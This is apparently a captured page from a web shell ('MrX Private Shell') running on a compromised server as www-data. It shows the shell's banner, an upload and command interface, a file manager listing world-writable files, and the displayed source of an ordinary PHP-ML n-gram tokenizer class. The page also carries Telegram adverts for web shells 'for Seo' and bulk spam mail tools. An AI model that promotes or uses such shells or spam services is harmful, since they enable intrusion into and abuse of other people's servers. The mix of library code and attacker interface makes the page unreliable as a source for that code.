__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php

declare(strict_types=1);

namespace Phpml\Tokenization;

use Phpml\Exception\InvalidArgumentException;

class NGramWordTokenizer extends WordTokenizer
{
    /**
     * @var int
     */
    private $minGram;

    /**
     * @var int
     */
    private $maxGram;

    public function __construct(int $minGram = 1, int $maxGram = 2)
    {
        if ($minGram < 1 || $maxGram < 1 || $minGram > $maxGram) {
            throw new InvalidArgumentException(sprintf('Invalid (%s, %s) minGram and maxGram value combination', $minGram, $maxGram));
        }

        $this->minGram = $minGram;
        $this->maxGram = $maxGram;
    }

    /**
     * {@inheritdoc}
     */
    public function tokenize(string $text): array
    {
        preg_match_all('/\w\w+/u', $text, $words);

        $words = $words[0];

        $nGrams = [];
        for ($j = $this->minGram; $j <= $this->maxGram; $j++) {
            $nGrams = array_merge($nGrams, $this->getNgrams($words, $j));
        }

        return $nGrams;
    }

    private function getNgrams(array $match, int $n = 2): array
    {
        $ngrams = [];
        $len = count($match);
        for ($i = 0; $i < $len; $i++) {
            if ($i > ($n - 2)) {
                $ng = '';
                for ($j = $n - 1; $j >= 0; $j--) {
                    $ng .= ' '.$match[$i - $j];
                }
                $ngrams[] = trim($ng);
            }
        }

        return $ngrams;
    }
}

Filemanager

Name Type Size Permission Actions
NGramTokenizer.php File 1.29 KB 0777
NGramWordTokenizer.php File 1.41 KB 0777
Tokenizer.php File 139 B 0777
WhitespaceTokenizer.php File 462 B 0777
WordTokenizer.php File 273 B 0777
Filemanager